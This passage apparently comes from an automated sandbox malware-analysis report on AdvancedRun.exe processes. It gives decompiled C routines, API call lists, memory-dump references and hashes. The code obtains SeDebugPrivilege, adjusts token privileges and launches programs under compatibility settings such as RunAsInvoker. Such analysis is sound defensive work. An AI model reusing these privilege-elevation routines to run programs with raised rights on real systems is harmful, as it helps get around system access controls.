					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}













                                                                                      0x00405adf
                                                                                      0x00405ae6
                                                                                      0x00405af5
                                                                                      0x00405af6
                                                                                      0x00405afb
                                                                                      0x00405b00
                                                                                      0x00405b0a
                                                                                      0x00405b18
                                                                                      0x00405b19
                                                                                      0x00405b1e
                                                                                      0x00405b2c
                                                                                      0x00405b2d
                                                                                      0x00405b36
                                                                                      0x00405b37
                                                                                      0x00405b3c
                                                                                      0x00405b4a
                                                                                      0x00405b4b
                                                                                      0x00405b54
                                                                                      0x00405b55
                                                                                      0x00405b5a
                                                                                      0x00405b68
                                                                                      0x00405b69
                                                                                      0x00405b72
                                                                                      0x00405b73
                                                                                      0x00405b7b
                                                                                      0x00000000
                                                                                      0x00405b7b
                                                                                      0x00405b80

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??2@
                                                                                      • String ID:
                                                                                      • API String ID: 1033339047-0
                                                                                      • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                      • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                      • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                      • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Analysis Process: AdvancedRun.exe PID: 5744 Parent PID: 4436 AdvancedRun.exeCOMMON

                                                                                      Executed Functions

                                                                                      Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                      0x00408fc9
                                                                                      0x00408fd0
                                                                                      0x00408fe8
                                                                                      0x00000000
                                                                                      0x00408fea
                                                                                      0x00408ff4
                                                                                      0x00409001
                                                                                      0x00409003
                                                                                      0x0040900c
                                                                                      0x0040900e
                                                                                      0x00409010
                                                                                      0x0040901a
                                                                                      0x0040901a
                                                                                      0x00409010
                                                                                      0x0040901f
                                                                                      0x00409026
                                                                                      0x0040902d
                                                                                      0x00409030
                                                                                      0x00409035
                                                                                      0x00409037
                                                                                      0x00409040
                                                                                      0x00409042
                                                                                      0x00409044
                                                                                      0x00409051
                                                                                      0x00409051
                                                                                      0x00409044
                                                                                      0x00409053
                                                                                      0x0040905e
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                        • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                      • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                      • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                      • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                      • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                      • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                      • API String ID: 616250965-1253513912
                                                                                      • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                      • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                      • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                      • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 83%
                                                                                      			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                      0x004022d5
                                                                                      0x004022dd
                                                                                      0x004022e7
                                                                                      0x004022ec
                                                                                      0x004022f7
                                                                                      0x004022fa
                                                                                      0x004022fd
                                                                                      0x00402300
                                                                                      0x00402307
                                                                                      0x0040230d
                                                                                      0x0040230e
                                                                                      0x00402318
                                                                                      0x00402321
                                                                                      0x00402324
                                                                                      0x00402327
                                                                                      0x0040232a
                                                                                      0x0040232d
                                                                                      0x00402334
                                                                                      0x00402337
                                                                                      0x0040233e
                                                                                      0x0040234f
                                                                                      0x00402356
                                                                                      0x0040235b
                                                                                      0x0040235e
                                                                                      0x0040236d
                                                                                      0x00402374
                                                                                      0x0040237e
                                                                                      0x00402395
                                                                                      0x004023a0
                                                                                      0x004023a0
                                                                                      0x004023ac
                                                                                      0x004023cf
                                                                                      0x004023d2
                                                                                      0x004023d9
                                                                                      0x004023de
                                                                                      0x004023f6
                                                                                      0x00402403
                                                                                      0x00402414
                                                                                      0x00402419
                                                                                      0x00402403
                                                                                      0x0040241a
                                                                                      0x00402423
                                                                                      0x00402458
                                                                                      0x0040245d
                                                                                      0x00402464
                                                                                      0x00402467
                                                                                      0x00402468
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402425
                                                                                      0x00402428
                                                                                      0x0040242b
                                                                                      0x00402433
                                                                                      0x00402434
                                                                                      0x00402473
                                                                                      0x00402473
                                                                                      0x0040247c
                                                                                      0x00402481
                                                                                      0x00402488
                                                                                      0x00402488
                                                                                      0x00402495
                                                                                      0x0040249a
                                                                                      0x004024b7
                                                                                      0x004024be
                                                                                      0x004024cd
                                                                                      0x004024d1
                                                                                      0x004024ed
                                                                                      0x004024f0
                                                                                      0x00402506
                                                                                      0x0040250b
                                                                                      0x00402512
                                                                                      0x00402518
                                                                                      0x00402519
                                                                                      0x0040251e
                                                                                      0x00402524
                                                                                      0x00402527
                                                                                      0x0040252b
                                                                                      0x00402530
                                                                                      0x00402531
                                                                                      0x00402531
                                                                                      0x0040253d
                                                                                      0x0040255a
                                                                                      0x00402561
                                                                                      0x00402570
                                                                                      0x00402574
                                                                                      0x00402590
                                                                                      0x00402593
                                                                                      0x004025a9
                                                                                      0x004025ae
                                                                                      0x004025b5
                                                                                      0x004025bb
                                                                                      0x004025bc
                                                                                      0x004025c1
                                                                                      0x004025c7
                                                                                      0x004025ca
                                                                                      0x004025cd
                                                                                      0x004025ce
                                                                                      0x004025d4
                                                                                      0x004025d4
                                                                                      0x004025da
                                                                                      0x004025e3
                                                                                      0x004025eb
                                                                                      0x00402633
                                                                                      0x004025fb
                                                                                      0x00402608
                                                                                      0x0040260f
                                                                                      0x00402614
                                                                                      0x00402624
                                                                                      0x00402630
                                                                                      0x00402630
                                                                                      0x0040263a
                                                                                      0x0040263b
                                                                                      0x00402646
                                                                                      0x0040264b
                                                                                      0x0040264c
                                                                                      0x0040265a
                                                                                      0x0040265a
                                                                                      0x0040265d
                                                                                      0x00402666
                                                                                      0x00402668
                                                                                      0x00402668
                                                                                      0x00402672
                                                                                      0x00402675
                                                                                      0x0040267e
                                                                                      0x0040267e
                                                                                      0x00402683
                                                                                      0x0040268b
                                                                                      0x0040269e
                                                                                      0x0040269e
                                                                                      0x004026a3
                                                                                      0x004026ac
                                                                                      0x004026b5
                                                                                      0x004026b8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004026ba
                                                                                      0x00000000
                                                                                      0x004026ae
                                                                                      0x004026ae
                                                                                      0x004026bf
                                                                                      0x004026c1
                                                                                      0x004026c6
                                                                                      0x004026cc
                                                                                      0x004026d5
                                                                                      0x004026db
                                                                                      0x004026e4
                                                                                      0x004026ea
                                                                                      0x004026f3
                                                                                      0x004026f9
                                                                                      0x00402707
                                                                                      0x00402707
                                                                                      0x0040270d
                                                                                      0x00402710
                                                                                      0x0040276d
                                                                                      0x00402770
                                                                                      0x0040280b
                                                                                      0x0040280e
                                                                                      0x00402813
                                                                                      0x00402810
                                                                                      0x00402810
                                                                                      0x00402810
                                                                                      0x00402819
                                                                                      0x0040281f
                                                                                      0x00402836
                                                                                      0x00402841
                                                                                      0x00402846
                                                                                      0x0040284a
                                                                                      0x00402851
                                                                                      0x00402857
                                                                                      0x00402860
                                                                                      0x00402865
                                                                                      0x00402876
                                                                                      0x00402879
                                                                                      0x00402888
                                                                                      0x00402888
                                                                                      0x00402857
                                                                                      0x00402891
                                                                                      0x0040289c
                                                                                      0x0040289c
                                                                                      0x00402779
                                                                                      0x00402784
                                                                                      0x0040278d
                                                                                      0x004027a4
                                                                                      0x004027b3
                                                                                      0x004027b8
                                                                                      0x004027bb
                                                                                      0x004027bf
                                                                                      0x004027c6
                                                                                      0x004027c6
                                                                                      0x004027d1
                                                                                      0x004027d6
                                                                                      0x004027d9
                                                                                      0x004027db
                                                                                      0x004027e2
                                                                                      0x004027e4
                                                                                      0x004027e4
                                                                                      0x004027e7
                                                                                      0x004027f4
                                                                                      0x004027fc
                                                                                      0x00402801
                                                                                      0x00402801
                                                                                      0x00402803
                                                                                      0x00402803
                                                                                      0x00402806
                                                                                      0x00000000
                                                                                      0x00402806
                                                                                      0x00402715
                                                                                      0x00402729
                                                                                      0x0040272e
                                                                                      0x00402731
                                                                                      0x00402738
                                                                                      0x00402738
                                                                                      0x00402743
                                                                                      0x00402748
                                                                                      0x0040274d
                                                                                      0x00402754
                                                                                      0x00402756
                                                                                      0x00402756
                                                                                      0x00402759
                                                                                      0x00402763
                                                                                      0x00000000
                                                                                      0x00402763
                                                                                      0x004026fb
                                                                                      0x00402700
                                                                                      0x00402702
                                                                                      0x00000000
                                                                                      0x00402702
                                                                                      0x004026ec
                                                                                      0x00000000
                                                                                      0x004026ec
                                                                                      0x004026dd
                                                                                      0x00000000
                                                                                      0x004026dd
                                                                                      0x004026ce
                                                                                      0x00000000
                                                                                      0x004026ce
                                                                                      0x004026ac
                                                                                      0x00402443
                                                                                      0x0040246a
                                                                                      0x00402470
                                                                                      0x00000000
                                                                                      0x00402470

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00402300
                                                                                      • memset.MSVCRT ref: 0040233E
                                                                                      • memset.MSVCRT ref: 00402356
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                      • wcschr.MSVCRT ref: 00402387
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                        • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                        • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                      • wcschr.MSVCRT ref: 004023B7
                                                                                      • memset.MSVCRT ref: 004023D9
                                                                                      • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                      • wcschr.MSVCRT ref: 0040242B
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                      • memset.MSVCRT ref: 004024BE
                                                                                      • memset.MSVCRT ref: 004024D1
                                                                                      • _wtoi.MSVCRT ref: 00402519
                                                                                      • _wtoi.MSVCRT ref: 0040252B
                                                                                      • memset.MSVCRT ref: 00402561
                                                                                      • memset.MSVCRT ref: 00402574
                                                                                      • _wtoi.MSVCRT ref: 004025BC
                                                                                      • _wtoi.MSVCRT ref: 004025CE
                                                                                      • wcschr.MSVCRT ref: 004025F0
                                                                                      • memset.MSVCRT ref: 0040260F
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                      • _snwprintf.MSVCRT ref: 0040264C
                                                                                      • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                      • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                      • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                      • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                      • API String ID: 2452314994-435178042
                                                                                      • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                      • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                      • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                      • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 89%
                                                                                      			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t154;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12); // executed
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
